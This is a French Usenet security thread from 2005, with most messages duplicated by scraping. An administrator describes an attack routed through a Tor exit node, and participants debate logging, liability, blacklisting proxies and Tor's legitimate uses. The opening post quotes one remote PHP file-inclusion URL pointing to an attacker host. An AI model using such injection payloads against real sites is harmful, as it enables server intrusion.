récemment, une personne sans doute mal intentionnée a cherché à attaquer
un serveur web que j'administre. (Serveur sous Linux, bien à jour,
firewallé et tout ce qui s'en suit).
Les attaques vers les serveurs internet sont choses courantes, j'en
enregistre (vive Snort) plus de mille par jour, souvent de simples scans
nmap ou des attaques de machines infestées par des vers, et cetera. Rien
d'alarmant en somme.
Cette fois l'attaque en question a consisté à faire un full scan des
ports ouverts, de quelques tests de vulnérabilité sur les ports smtp,
dns, pop et http, et enfin, d'une tentative d'injection de code PHP sur
une des pages, du genre passage de paramètres comme :
popup.php?page=http://scriptkiddieland.com/install_passwordless_ssh.txt
Cela signifie je pense que l'attaquant en question connaissait le site
web qu'héberge ce serveur (ou s'y est vraiment interessé de près) et n'a
pas juste attaqué une IP au hasard.
Habituellement, quand je remarque une telle attaque, je regarde la
localisation de l'ip et la compare avec celles de mes bases de données,
pour essayer d'identifier la personne mal intentionnée et éventuellement
lui remonter les bretelles si je dispose de son mail, etc.
Cette fois, l'ip correspondait à un serveur hébergé à l'université
d'Harvard, en me rendant sur le site j'ai pu facilement trouver l'email
de l'admin de la machine, et lui ai demandé poliment de vérifier que sa
machine n'était pas trouée et de faire le nécessaire pour que l'on
n'attaque plus mon serveur à partir de son IP.
Sa réponse ne manque pas d'éloquance, il m'explique qu'il ne peut pas me
donner l'identité de l'attaquant ni même une IP, pour la simple raison
que sa machine est un noeud 'exit' d'un réseau TOR, qui est apparemment
un anonymiseur TCP qui sert justement à empecher que l'on remonte à
l'IP d'origine d'une connexion. sic .
Voilà, désolé pour le résumé un peu long, voici les questions que je me
pose :
- Est il vraiment utile de garder les IPs utilisées lors des
attaques "sérieuses" que subit un serveur, ou est ce complètement vain
- Au cas où une attaque réussirait et qu'un serveur serait
rootkité puis utilisé à des fins peu louables, l'adresse IP du hacker
peut elle m'être utile pour espérer un dedomagement
- Ce réseau d'anonymiseur TOR , c'est le système rêvé pour
attaquer n'importe qui en toute impunité et avec les pires vilainies qui
soient non? C'est légal?
- Si une attaque à partir de ce réseau TOR fini par faire tomber
un serveur, qui dois-je considérer comme responsable ?
Mais bon, on peut déjà faire un tri, et blacklister tous les proxies anonymes. On le fait bien depuis des années pour les serveurs SMTP ouverts...
Sauf que pour les proxies, c'est un peu plus comlpliqué à trouver. Ils n'écoutent pas tous sur les ports 3128 et/ou 8000. Les proxys malfaisants jamais, en fait.
XAv -- Xavier HUMBERT INJEP - NetBSD, parce que je le vaux bien
Fabien LE LEZ <gramster@gramster.com> wrote:
Mais bon, on peut déjà faire un tri, et blacklister tous les
proxies anonymes. On le fait bien depuis des années pour les serveurs
SMTP ouverts...
Sauf que pour les proxies, c'est un peu plus comlpliqué à trouver. Ils
n'écoutent pas tous sur les ports 3128 et/ou 8000. Les proxys
malfaisants jamais, en fait.
XAv
--
Xavier HUMBERT
INJEP - NetBSD, parce que je le vaux bien
Mais bon, on peut déjà faire un tri, et blacklister tous les proxies anonymes. On le fait bien depuis des années pour les serveurs SMTP ouverts...
Sauf que pour les proxies, c'est un peu plus comlpliqué à trouver. Ils n'écoutent pas tous sur les ports 3128 et/ou 8000. Les proxys malfaisants jamais, en fait.
XAv -- Xavier HUMBERT INJEP - NetBSD, parce que je le vaux bien
Cedric Blancher
Le Tue, 15 Mar 2005 12:28:34 +0000, Thomas a écrit :
d'apres ce que j'ai compris, il avait bien compris ca - il ne voulait pas bloquer tous les proxys because ca bloquerait trop d'inocents
Certes.
- il a remarqué que les proxys de FAI n'etaient pas accessibles par TOR
Ce qui n'est pas vrai. Supposons un abonné du FAI MegaFastWeb. En tant que client de ce FAI, il a accès au proxy de MegaFastWeb. Right ? Maintenant, il décide d'installer un noeud de sortie TOR sur sa machine. Comme il a accès à ce proxy, les applications qui tournent sur sa machine héritent de ce droit, et de fait, les flux TOR qui sortent par lui aussi. Donc, in fine, un utilisateur sortant par ce noeud pourrait utiliser le proxy de MegaFastWeb pour relayer ses flux. CQFD.
Ah et puis effectivement, c'est le client qui choisit son chemin dans le nuage, donc l'utilisateur peut, même si c'est normallement choisit aléatoirement parmi une liste de relais, choisir son chemin, donc son noeud de sortie.
donc, est ce qu'on peut se permettre de bloquer tous les proxys sauf ceux des FAIs ?
Comment fais-tu la différence entre une requête venant d'un proxy et une requête venant d'un client ?
ou du moins, plus generalement, tous les proxys qui acceptent les TOR ?
Tu as une liste des ces gens là ? Pour aller plus loin, mets-toi à la place d'un admin de proxy. Tu as la liste de tous les noeuds de sortie TOR pour les blacklister sur ton proxy ?
Sur un plan purement idéologique, il me semble un peu bourrin de blacklister les noeuds TOR parce qu'on pourrait les utiliser à mauvaise escient. Personnellement, je préfère passer mon temps à durcir ma sécurité qu'à en perdre à mettre en place des blacklist possiblement contreproductive (blocage de clients légitimes), sûrement incomplètes et carrément difficile à maintenir.
on bloquerait pas trop de monde ?
Probablement oui, et en définitive jamais assez parce que tu n'auras pas tous ceux que tu voulais au départ.
si oui, alors ca serait une bonne idée de maintenir à jour une liste de ces IPs, oui :-)
Just do it :)
j'ai pas compris
Cf. supra.
-- Il s'est sans doute laissé impressionner par les cris d'orfraie du quarteron de fufopithèques en furie. -+- MB in: Guide du Cabaliste Usenet - Bien configurer son MB -+-
Le Tue, 15 Mar 2005 12:28:34 +0000, Thomas a écrit :
d'apres ce que j'ai compris, il avait bien compris ca
- il ne voulait pas bloquer tous les proxys because ca bloquerait trop
d'inocents
Certes.
- il a remarqué que les proxys de FAI n'etaient pas accessibles par TOR
Ce qui n'est pas vrai.
Supposons un abonné du FAI MegaFastWeb. En tant que client de ce FAI, il
a accès au proxy de MegaFastWeb. Right ? Maintenant, il décide
d'installer un noeud de sortie TOR sur sa machine. Comme il a accès à ce
proxy, les applications qui tournent sur sa machine héritent de ce droit,
et de fait, les flux TOR qui sortent par lui aussi. Donc, in fine, un
utilisateur sortant par ce noeud pourrait utiliser le proxy de MegaFastWeb
pour relayer ses flux. CQFD.
Ah et puis effectivement, c'est le client qui choisit son chemin dans le
nuage, donc l'utilisateur peut, même si c'est normallement choisit
aléatoirement parmi une liste de relais, choisir son chemin, donc son
noeud de sortie.
donc, est ce qu'on peut se permettre de bloquer tous les proxys sauf
ceux des FAIs ?
Comment fais-tu la différence entre une requête venant d'un proxy et une
requête venant d'un client ?
ou du moins, plus generalement, tous les proxys qui acceptent les TOR ?
Tu as une liste des ces gens là ? Pour aller plus loin, mets-toi à la
place d'un admin de proxy. Tu as la liste de tous les noeuds de sortie TOR
pour les blacklister sur ton proxy ?
Sur un plan purement idéologique, il me semble un peu bourrin de
blacklister les noeuds TOR parce qu'on pourrait les utiliser à mauvaise
escient. Personnellement, je préfère passer mon temps à durcir ma
sécurité qu'à en perdre à mettre en place des blacklist possiblement
contreproductive (blocage de clients légitimes), sûrement incomplètes
et carrément difficile à maintenir.
on bloquerait pas trop de monde ?
Probablement oui, et en définitive jamais assez parce que tu n'auras pas
tous ceux que tu voulais au départ.
si oui, alors ca serait une bonne idée de maintenir à jour une liste
de ces IPs, oui :-)
Just do it :)
j'ai pas compris
Cf. supra.
--
Il s'est sans doute laissé impressionner par les cris d'orfraie du
quarteron de fufopithèques en furie.
-+- MB in: Guide du Cabaliste Usenet - Bien configurer son MB -+-
Le Tue, 15 Mar 2005 12:28:34 +0000, Thomas a écrit :
d'apres ce que j'ai compris, il avait bien compris ca - il ne voulait pas bloquer tous les proxys because ca bloquerait trop d'inocents
Certes.
- il a remarqué que les proxys de FAI n'etaient pas accessibles par TOR
Ce qui n'est pas vrai. Supposons un abonné du FAI MegaFastWeb. En tant que client de ce FAI, il a accès au proxy de MegaFastWeb. Right ? Maintenant, il décide d'installer un noeud de sortie TOR sur sa machine. Comme il a accès à ce proxy, les applications qui tournent sur sa machine héritent de ce droit, et de fait, les flux TOR qui sortent par lui aussi. Donc, in fine, un utilisateur sortant par ce noeud pourrait utiliser le proxy de MegaFastWeb pour relayer ses flux. CQFD.
Ah et puis effectivement, c'est le client qui choisit son chemin dans le nuage, donc l'utilisateur peut, même si c'est normallement choisit aléatoirement parmi une liste de relais, choisir son chemin, donc son noeud de sortie.
donc, est ce qu'on peut se permettre de bloquer tous les proxys sauf ceux des FAIs ?
Comment fais-tu la différence entre une requête venant d'un proxy et une requête venant d'un client ?
ou du moins, plus generalement, tous les proxys qui acceptent les TOR ?
Tu as une liste des ces gens là ? Pour aller plus loin, mets-toi à la place d'un admin de proxy. Tu as la liste de tous les noeuds de sortie TOR pour les blacklister sur ton proxy ?
Sur un plan purement idéologique, il me semble un peu bourrin de blacklister les noeuds TOR parce qu'on pourrait les utiliser à mauvaise escient. Personnellement, je préfère passer mon temps à durcir ma sécurité qu'à en perdre à mettre en place des blacklist possiblement contreproductive (blocage de clients légitimes), sûrement incomplètes et carrément difficile à maintenir.
on bloquerait pas trop de monde ?
Probablement oui, et en définitive jamais assez parce que tu n'auras pas tous ceux que tu voulais au départ.
si oui, alors ca serait une bonne idée de maintenir à jour une liste de ces IPs, oui :-)
Just do it :)
j'ai pas compris
Cf. supra.
-- Il s'est sans doute laissé impressionner par les cris d'orfraie du quarteron de fufopithèques en furie. -+- MB in: Guide du Cabaliste Usenet - Bien configurer son MB -+-
J1
Sur un plan purement idéologique, il me semble un peu bourrin de blacklister les noeuds TOR parce qu'on pourrait les utiliser à mauvaise escient. Personnellement, je préfère passer mon temps à durcir ma sécurité qu'à en perdre à mettre en place des blacklist possiblement contreproductive (blocage de clients légitimes), sûrement incomplètes et carrément difficile à maintenir.
Oui c'est la problématique inérante à toutes les blacklists. Il faut maintenir à jour et ne pas bloquer les connexions légitimes. C'est ce qui rend en pratique ce système difficilement utilisable. Cf les nombreux problèmes de SMTP blacklistés.
L'idée du blacklistage des noeuds de sortie TOR est sans doute un peu vaine au regard de l'utilisation des proxies HTTP. Cependant, TOR anonymise toutes les connexions TCP, pas uniquement des connexions HTTP... Existe t il beaucoup d'autres anonymiseurs TCP ?
Enfin concernant l'aspect idéologique, je ne suis pas sur que le réseau TOR soit utilisé, si on excepte les développeurs de ce réseau lui même, par beaucoup d'autres personnes que des hackers ou autres individus agissant à mauvais escient. (Avis personnel, que je ne demande qu'à faire évoluer)
Personnellement il ne m'interesserait pas vraiment de voir toutes mes connexions passer par deux, trois ou n routeurs (apperemment il s'agit uniquement de serveurs, pas de routeurs dédiés, qui plus est) supplémentaires. Les temps de latence, doivent exploser, non? Mais n'ayant jamais utilisé TOR, je m'avance sans doute un peu.
-- J1
Sur un plan purement idéologique, il me semble un peu bourrin de
blacklister les noeuds TOR parce qu'on pourrait les utiliser à mauvaise
escient. Personnellement, je préfère passer mon temps à durcir ma
sécurité qu'à en perdre à mettre en place des blacklist possiblement
contreproductive (blocage de clients légitimes), sûrement incomplètes
et carrément difficile à maintenir.
Oui c'est la problématique inérante à toutes les blacklists.
Il faut maintenir à jour et ne pas bloquer les connexions légitimes.
C'est ce qui rend en pratique ce système difficilement utilisable.
Cf les nombreux problèmes de SMTP blacklistés.
L'idée du blacklistage des noeuds de sortie TOR est sans doute un peu
vaine au regard de l'utilisation des proxies HTTP.
Cependant, TOR anonymise toutes les connexions TCP, pas uniquement des
connexions HTTP... Existe t il beaucoup d'autres anonymiseurs TCP ?
Enfin concernant l'aspect idéologique, je ne suis pas sur que le réseau
TOR soit utilisé, si on excepte les développeurs de ce réseau lui même,
par beaucoup d'autres personnes que des hackers ou autres individus
agissant à mauvais escient. (Avis personnel, que je ne demande qu'à
faire évoluer)
Personnellement il ne m'interesserait pas vraiment de voir toutes mes
connexions passer par deux, trois ou n routeurs (apperemment il s'agit
uniquement de serveurs, pas de routeurs dédiés, qui plus est)
supplémentaires. Les temps de latence, doivent exploser, non?
Mais n'ayant jamais utilisé TOR, je m'avance sans doute un peu.
Sur un plan purement idéologique, il me semble un peu bourrin de blacklister les noeuds TOR parce qu'on pourrait les utiliser à mauvaise escient. Personnellement, je préfère passer mon temps à durcir ma sécurité qu'à en perdre à mettre en place des blacklist possiblement contreproductive (blocage de clients légitimes), sûrement incomplètes et carrément difficile à maintenir.
Oui c'est la problématique inérante à toutes les blacklists. Il faut maintenir à jour et ne pas bloquer les connexions légitimes. C'est ce qui rend en pratique ce système difficilement utilisable. Cf les nombreux problèmes de SMTP blacklistés.
L'idée du blacklistage des noeuds de sortie TOR est sans doute un peu vaine au regard de l'utilisation des proxies HTTP. Cependant, TOR anonymise toutes les connexions TCP, pas uniquement des connexions HTTP... Existe t il beaucoup d'autres anonymiseurs TCP ?
Enfin concernant l'aspect idéologique, je ne suis pas sur que le réseau TOR soit utilisé, si on excepte les développeurs de ce réseau lui même, par beaucoup d'autres personnes que des hackers ou autres individus agissant à mauvais escient. (Avis personnel, que je ne demande qu'à faire évoluer)
Personnellement il ne m'interesserait pas vraiment de voir toutes mes connexions passer par deux, trois ou n routeurs (apperemment il s'agit uniquement de serveurs, pas de routeurs dédiés, qui plus est) supplémentaires. Les temps de latence, doivent exploser, non? Mais n'ayant jamais utilisé TOR, je m'avance sans doute un peu.
-- J1
Thomas
In article (Dans l'article) , Cedric Blancher wrote (écrivait) :
Le Tue, 15 Mar 2005 12:28:34 +0000, Thomas a écrit :
d'apres ce que j'ai compris, il avait bien compris ca - il ne voulait pas bloquer tous les proxys because ca bloquerait trop d'inocents
Certes.
- il a remarqué que les proxys de FAI n'etaient pas accessibles par TOR
Ce qui n'est pas vrai. Supposons un abonné du FAI MegaFastWeb. En tant que client de ce FAI, il a accès au proxy de MegaFastWeb. Right ? Maintenant, il décide d'installer un noeud de sortie TOR sur sa machine.
ah, j'avais pas compris que n'importe qui pouvait faire un neud tor sur un coup de tete :-) je croyais qu'il fallait etre admin d'une grosse structure :-)
Sur un plan purement idéologique, il me semble un peu bourrin de blacklister les noeuds TOR parce qu'on pourrait les utiliser à mauvaise escient. Personnellement, je préfère passer mon temps à durcir ma sécurité qu'à en perdre à mettre en place des blacklist possiblement contreproductive (blocage de clients légitimes), sûrement incomplètes et carrément difficile à maintenir.
ah oui, tout à fait d'accord :-)
j'ai pas compris
Cf. supra.
idem ;-)
-- si je dors : wakeonlan -i tDeContes.hd.free.fr 00:03:93:AF:45:AE (seulement dans le 1/4 h où mon ordi est mis en veille, donc je vous invite à réclamer à free : l'acces à arp -s, ou la possibilité de rediriger le NAT sur l'adresse de broadcast :-) )
"don't put your PC out of the window, put windows out of your PC" "petit Free qui devient grand, gêne les requins blancs"
In article (Dans l'article)
<pan.2005.03.15.12.45.43.594405@cartel-securite.fr>,
Cedric Blancher <blancher@cartel-securite.fr> wrote (écrivait) :
Le Tue, 15 Mar 2005 12:28:34 +0000, Thomas a écrit :
d'apres ce que j'ai compris, il avait bien compris ca
- il ne voulait pas bloquer tous les proxys because ca bloquerait trop
d'inocents
Certes.
- il a remarqué que les proxys de FAI n'etaient pas accessibles par TOR
Ce qui n'est pas vrai.
Supposons un abonné du FAI MegaFastWeb. En tant que client de ce FAI, il
a accès au proxy de MegaFastWeb. Right ? Maintenant, il décide
d'installer un noeud de sortie TOR sur sa machine.
ah, j'avais pas compris que n'importe qui pouvait faire un neud tor sur
un coup de tete :-)
je croyais qu'il fallait etre admin d'une grosse structure :-)
Sur un plan purement idéologique, il me semble un peu bourrin de
blacklister les noeuds TOR parce qu'on pourrait les utiliser à mauvaise
escient. Personnellement, je préfère passer mon temps à durcir ma
sécurité qu'à en perdre à mettre en place des blacklist possiblement
contreproductive (blocage de clients légitimes), sûrement incomplètes
et carrément difficile à maintenir.
ah oui, tout à fait d'accord :-)
j'ai pas compris
Cf. supra.
idem ;-)
--
si je dors : wakeonlan -i tDeContes.hd.free.fr 00:03:93:AF:45:AE
(seulement dans le 1/4 h où mon ordi est mis en veille,
donc je vous invite à réclamer à free : l'acces à arp -s,
ou la possibilité de rediriger le NAT sur l'adresse de broadcast :-) )
"don't put your PC out of the window, put windows out of your PC"
"petit Free qui devient grand, gêne les requins blancs"
In article (Dans l'article) , Cedric Blancher wrote (écrivait) :
Le Tue, 15 Mar 2005 12:28:34 +0000, Thomas a écrit :
d'apres ce que j'ai compris, il avait bien compris ca - il ne voulait pas bloquer tous les proxys because ca bloquerait trop d'inocents
Certes.
- il a remarqué que les proxys de FAI n'etaient pas accessibles par TOR
Ce qui n'est pas vrai. Supposons un abonné du FAI MegaFastWeb. En tant que client de ce FAI, il a accès au proxy de MegaFastWeb. Right ? Maintenant, il décide d'installer un noeud de sortie TOR sur sa machine.
ah, j'avais pas compris que n'importe qui pouvait faire un neud tor sur un coup de tete :-) je croyais qu'il fallait etre admin d'une grosse structure :-)
Sur un plan purement idéologique, il me semble un peu bourrin de blacklister les noeuds TOR parce qu'on pourrait les utiliser à mauvaise escient. Personnellement, je préfère passer mon temps à durcir ma sécurité qu'à en perdre à mettre en place des blacklist possiblement contreproductive (blocage de clients légitimes), sûrement incomplètes et carrément difficile à maintenir.
ah oui, tout à fait d'accord :-)
j'ai pas compris
Cf. supra.
idem ;-)
-- si je dors : wakeonlan -i tDeContes.hd.free.fr 00:03:93:AF:45:AE (seulement dans le 1/4 h où mon ordi est mis en veille, donc je vous invite à réclamer à free : l'acces à arp -s, ou la possibilité de rediriger le NAT sur l'adresse de broadcast :-) )
"don't put your PC out of the window, put windows out of your PC" "petit Free qui devient grand, gêne les requins blancs"
Stephane Catteau
Cedric Blancher nous disait récement dans fr.comp.securite <news: :
Ah et puis effectivement, c'est le client qui choisit son chemin dans le nuage, donc l'utilisateur peut, même si c'est normallement choisit aléatoirement parmi une liste de relais, choisir son chemin, donc son noeud de sortie.
Et de toute façon, qu'est-ce qui interdit à l'utilisateur de passer d'abord par une page affichant l'adresse IP en fin de chaîne, et d'avoir une liste des adresses des proxy des principaux FAI, utilisant ainsi le bon proxy pour le bon noeud de sortie ?
-- "En amour, on plaît plutôt par d'agréables défauts que par des qualités essentielles ; les grandes vertus sont des pièces d'or, dont on fait moins usage que de la monnaie" Ninon de Lenclos
Cedric Blancher nous disait récement dans fr.comp.securite
<news:pan.2005.03.15.12.45.43.594405@cartel-securite.fr> :
Ah et puis effectivement, c'est le client qui choisit son chemin
dans le nuage, donc l'utilisateur peut, même si c'est normallement
choisit aléatoirement parmi une liste de relais, choisir son
chemin, donc son noeud de sortie.
Et de toute façon, qu'est-ce qui interdit à l'utilisateur de passer
d'abord par une page affichant l'adresse IP en fin de chaîne, et
d'avoir une liste des adresses des proxy des principaux FAI, utilisant
ainsi le bon proxy pour le bon noeud de sortie ?
--
"En amour, on plaît plutôt par d'agréables défauts que par des qualités
essentielles ; les grandes vertus sont des pièces d'or, dont on fait
moins usage que de la monnaie"
Ninon de Lenclos
Cedric Blancher nous disait récement dans fr.comp.securite <news: :
Ah et puis effectivement, c'est le client qui choisit son chemin dans le nuage, donc l'utilisateur peut, même si c'est normallement choisit aléatoirement parmi une liste de relais, choisir son chemin, donc son noeud de sortie.
Et de toute façon, qu'est-ce qui interdit à l'utilisateur de passer d'abord par une page affichant l'adresse IP en fin de chaîne, et d'avoir une liste des adresses des proxy des principaux FAI, utilisant ainsi le bon proxy pour le bon noeud de sortie ?
-- "En amour, on plaît plutôt par d'agréables défauts que par des qualités essentielles ; les grandes vertus sont des pièces d'or, dont on fait moins usage que de la monnaie" Ninon de Lenclos
Stephane Catteau
Cedric Blancher nous disait récement dans fr.comp.securite <news: :
Pour une connexion donnée, tu utiliseras le même noeud de sortie. C'est normal, si je t"envoies un SYN avec un noeud A et le ACK en réponse à ton SYN-ACK avec un noeud B, ta pile IP va avoir du mal à s'en sortir. De fait, pour chaque connexion que tu établis, tu as un circuit qui est ouvert au sein du nuage TOR et qui sera utilisé jusqu'à la mort de cette connexion.
Pour une connexion au sens TCP du terme, je comprends, mais apparament le principe est valable pour l'ensemble de la connexion physique, autrement J1 n'aurait pas pu isoler une adresse IP comme étant à l'origine de l'attaque qu'il a subit. Or, de ce point de vue là le noeud de sortie unique ne me semble pas s'imposer. On pourrait arguer que justement cela permet d'isoler une adresse IP, ce qui facilite l'analyse des logs[1], ce qui contre donc partiellement l'utilisation abusive de TOR en permettant au moins à l'admin d'être averti. Mais comme tu le disais toi-même, ça rend l'admin du noeud de sortie responsable de l'acte lui-même.
[1] Une analyse des logs du filtre IP ne retournerait probablement rien si un scan et quelques touches d'essais étaient faits avec une adresse IP différente à chaque fois.
-- "En amour, on plaît plutôt par d'agréables défauts que par des qualités essentielles ; les grandes vertus sont des pièces d'or, dont on fait moins usage que de la monnaie" Ninon de Lenclos
Cedric Blancher nous disait récement dans fr.comp.securite
<news:pan.2005.03.15.08.32.37.856823@cartel-securite.fr> :
Pour une connexion donnée, tu utiliseras le même noeud de sortie.
C'est normal, si je t"envoies un SYN avec un noeud A et le ACK en
réponse à ton SYN-ACK avec un noeud B, ta pile IP va avoir du mal
à s'en sortir. De fait, pour chaque connexion que tu établis, tu
as un circuit qui est ouvert au sein du nuage TOR et qui sera
utilisé jusqu'à la mort de cette connexion.
Pour une connexion au sens TCP du terme, je comprends, mais apparament
le principe est valable pour l'ensemble de la connexion physique,
autrement J1 n'aurait pas pu isoler une adresse IP comme étant à
l'origine de l'attaque qu'il a subit. Or, de ce point de vue là le
noeud de sortie unique ne me semble pas s'imposer.
On pourrait arguer que justement cela permet d'isoler une adresse IP,
ce qui facilite l'analyse des logs[1], ce qui contre donc partiellement
l'utilisation abusive de TOR en permettant au moins à l'admin d'être
averti. Mais comme tu le disais toi-même, ça rend l'admin du noeud de
sortie responsable de l'acte lui-même.
[1]
Une analyse des logs du filtre IP ne retournerait probablement rien si
un scan et quelques touches d'essais étaient faits avec une adresse IP
différente à chaque fois.
--
"En amour, on plaît plutôt par d'agréables défauts que par des qualités
essentielles ; les grandes vertus sont des pièces d'or, dont on fait
moins usage que de la monnaie"
Ninon de Lenclos
Cedric Blancher nous disait récement dans fr.comp.securite <news: :
Pour une connexion donnée, tu utiliseras le même noeud de sortie. C'est normal, si je t"envoies un SYN avec un noeud A et le ACK en réponse à ton SYN-ACK avec un noeud B, ta pile IP va avoir du mal à s'en sortir. De fait, pour chaque connexion que tu établis, tu as un circuit qui est ouvert au sein du nuage TOR et qui sera utilisé jusqu'à la mort de cette connexion.
Pour une connexion au sens TCP du terme, je comprends, mais apparament le principe est valable pour l'ensemble de la connexion physique, autrement J1 n'aurait pas pu isoler une adresse IP comme étant à l'origine de l'attaque qu'il a subit. Or, de ce point de vue là le noeud de sortie unique ne me semble pas s'imposer. On pourrait arguer que justement cela permet d'isoler une adresse IP, ce qui facilite l'analyse des logs[1], ce qui contre donc partiellement l'utilisation abusive de TOR en permettant au moins à l'admin d'être averti. Mais comme tu le disais toi-même, ça rend l'admin du noeud de sortie responsable de l'acte lui-même.
[1] Une analyse des logs du filtre IP ne retournerait probablement rien si un scan et quelques touches d'essais étaient faits avec une adresse IP différente à chaque fois.
-- "En amour, on plaît plutôt par d'agréables défauts que par des qualités essentielles ; les grandes vertus sont des pièces d'or, dont on fait moins usage que de la monnaie" Ninon de Lenclos
Cedric Blancher
Le Tue, 15 Mar 2005 15:16:10 +0000, Stephane Catteau a écrit :
Pour une connexion au sens TCP du terme, je comprends, mais apparament le principe est valable pour l'ensemble de la connexion physique,
Un bon client TOR bien configuré devrait générer un nouveau chemin pour _chaque_ connexion TCP, quelqu'en soit la destination. Donc deux chemins différents pour deux connexions successives à destination de la même machine. Mais supposons que l'attaquant soit passé en HTTP/1.1 avec keepalive, par exemple parce qu'il a tout fait depuis son browser. Toutes ses requêtes seront alors émise dans la même connexion TCP, et donc vue depuis la même IP.
autrement J1 n'aurait pas pu isoler une adresse IP comme étant à l'origine de l'attaque qu'il a subit.
Exact.
On pourrait arguer que justement cela permet d'isoler une adresse IP, ce qui facilite l'analyse des logs[1], ce qui contre donc partiellement l'utilisation abusive de TOR en permettant au moins à l'admin d'être averti.
Mais comme cet admin n'a aucune visibilité sur la source de ce qu'il fait sortir, il est bien avancé... À part fermer le service, je ne vois pas ce qu'il peut faire de plus.
Mais comme tu le disais toi-même, ça rend l'admin du noeud de sortie responsable de l'acte lui-même.
Je pense que oui.
-- C'est très bien FreeBSD ... a part qu'il manque un swapoff quand meme :-D... 7 Go de swap, ca modifie la gestion du swap, et ca devient très agressif le swap (il me swap slrn, le temps que je tapes avec vim presque). -+- NLS in GFA : "Attention à la corrosion par le swap !" -+-
Le Tue, 15 Mar 2005 15:16:10 +0000, Stephane Catteau a écrit :
Pour une connexion au sens TCP du terme, je comprends, mais apparament
le principe est valable pour l'ensemble de la connexion physique,
Un bon client TOR bien configuré devrait générer un nouveau chemin pour
_chaque_ connexion TCP, quelqu'en soit la destination. Donc deux chemins
différents pour deux connexions successives à destination de la même
machine.
Mais supposons que l'attaquant soit passé en HTTP/1.1 avec keepalive,
par exemple parce qu'il a tout fait depuis son browser. Toutes ses
requêtes seront alors émise dans la même connexion TCP, et donc vue
depuis la même IP.
autrement J1 n'aurait pas pu isoler une adresse IP comme étant à
l'origine de l'attaque qu'il a subit.
Exact.
On pourrait arguer que justement cela permet d'isoler une adresse IP,
ce qui facilite l'analyse des logs[1], ce qui contre donc partiellement
l'utilisation abusive de TOR en permettant au moins à l'admin d'être
averti.
Mais comme cet admin n'a aucune visibilité sur la source de ce qu'il fait
sortir, il est bien avancé... À part fermer le service, je ne vois pas
ce qu'il peut faire de plus.
Mais comme tu le disais toi-même, ça rend l'admin du noeud de sortie
responsable de l'acte lui-même.
Je pense que oui.
--
C'est très bien FreeBSD ... a part qu'il manque un swapoff quand meme :-D...
7 Go de swap, ca modifie la gestion du swap, et ca devient très agressif le
swap (il me swap slrn, le temps que je tapes avec vim presque).
-+- NLS in GFA : "Attention à la corrosion par le swap !" -+-
Le Tue, 15 Mar 2005 15:16:10 +0000, Stephane Catteau a écrit :
Pour une connexion au sens TCP du terme, je comprends, mais apparament le principe est valable pour l'ensemble de la connexion physique,
Un bon client TOR bien configuré devrait générer un nouveau chemin pour _chaque_ connexion TCP, quelqu'en soit la destination. Donc deux chemins différents pour deux connexions successives à destination de la même machine. Mais supposons que l'attaquant soit passé en HTTP/1.1 avec keepalive, par exemple parce qu'il a tout fait depuis son browser. Toutes ses requêtes seront alors émise dans la même connexion TCP, et donc vue depuis la même IP.
autrement J1 n'aurait pas pu isoler une adresse IP comme étant à l'origine de l'attaque qu'il a subit.
Exact.
On pourrait arguer que justement cela permet d'isoler une adresse IP, ce qui facilite l'analyse des logs[1], ce qui contre donc partiellement l'utilisation abusive de TOR en permettant au moins à l'admin d'être averti.
Mais comme cet admin n'a aucune visibilité sur la source de ce qu'il fait sortir, il est bien avancé... À part fermer le service, je ne vois pas ce qu'il peut faire de plus.
Mais comme tu le disais toi-même, ça rend l'admin du noeud de sortie responsable de l'acte lui-même.
Je pense que oui.
-- C'est très bien FreeBSD ... a part qu'il manque un swapoff quand meme :-D... 7 Go de swap, ca modifie la gestion du swap, et ca devient très agressif le swap (il me swap slrn, le temps que je tapes avec vim presque). -+- NLS in GFA : "Attention à la corrosion par le swap !" -+-
Cedric Blancher
Le Tue, 15 Mar 2005 17:36:39 +0000, Xavier a écrit :
Question sérieuse : ce résau peut-il servir des fins légitimes ?
Pourquoi ne pourrait-il pas ? Tu sais, les gens de l'EFF sont un peu paranos et en sentent le besoin...
-- L'usenet est un NG comme les autres , non ? C'est quoi ces règles à dix sous , là ? C'est ici qu'on se prend la tête ? -+- D23 in GNU - Le neuneu a dissous, et dissous c'est pas cher -+-
Le Tue, 15 Mar 2005 17:36:39 +0000, Xavier a écrit :
Question sérieuse : ce résau peut-il servir des fins légitimes ?
Pourquoi ne pourrait-il pas ? Tu sais, les gens de l'EFF sont un peu
paranos et en sentent le besoin...
--
L'usenet est un NG comme les autres , non ? C'est quoi ces règles à dix
sous , là ? C'est ici qu'on se prend la tête ?
-+- D23 in GNU - Le neuneu a dissous, et dissous c'est pas cher -+-
Le Tue, 15 Mar 2005 17:36:39 +0000, Xavier a écrit :
Question sérieuse : ce résau peut-il servir des fins légitimes ?
Pourquoi ne pourrait-il pas ? Tu sais, les gens de l'EFF sont un peu paranos et en sentent le besoin...
-- L'usenet est un NG comme les autres , non ? C'est quoi ces règles à dix sous , là ? C'est ici qu'on se prend la tête ? -+- D23 in GNU - Le neuneu a dissous, et dissous c'est pas cher -+-
Stephane Catteau
Xavier nous disait récement dans fr.comp.securite <news:1gth8l4.1ayixtsgubi80N% :
Cedric Blancher wrote:
C'est aussi le cas de Mixmaster en ce qui concerne le mail.
Question sérieuse : ce résau peut-il servir des fins légitimes ?
En plus des éternels opposants chinois, il peut être utilisé pour avertir la presse que la société machin, pour laquelle on travail, fait de vilaines choses[1], le tout sans craindre d'être foutu à la porte ou pire. En fait en prenant le temps d'y penser on doit pouvoir trouver des dizaines d'utilisations légitimes, mais toutes sont exceptionnelles. D'un point de vue légitime, l'interêt du réseau est donc ponctuel, mais comme il peut se montrer nécessaire à tout moment, il faut qu'il existe en permanence.
[1] De très vilaines choses évidement, pas juste un petit détournement de fond de temps en temps mais, par exemple, le blanchiment d'argent de la mafia. -- "En amour, on plaît plutôt par d'agréables défauts que par des qualités essentielles ; les grandes vertus sont des pièces d'or, dont on fait moins usage que de la monnaie" Ninon de Lenclos
Xavier nous disait récement dans fr.comp.securite
<news:1gth8l4.1ayixtsgubi80N%xavier@groumpf.org> :
C'est aussi le cas de Mixmaster en ce qui concerne le mail.
Question sérieuse : ce résau peut-il servir des fins légitimes ?
En plus des éternels opposants chinois, il peut être utilisé pour
avertir la presse que la société machin, pour laquelle on travail, fait
de vilaines choses[1], le tout sans craindre d'être foutu à la porte ou
pire.
En fait en prenant le temps d'y penser on doit pouvoir trouver des
dizaines d'utilisations légitimes, mais toutes sont exceptionnelles.
D'un point de vue légitime, l'interêt du réseau est donc ponctuel, mais
comme il peut se montrer nécessaire à tout moment, il faut qu'il existe
en permanence.
[1]
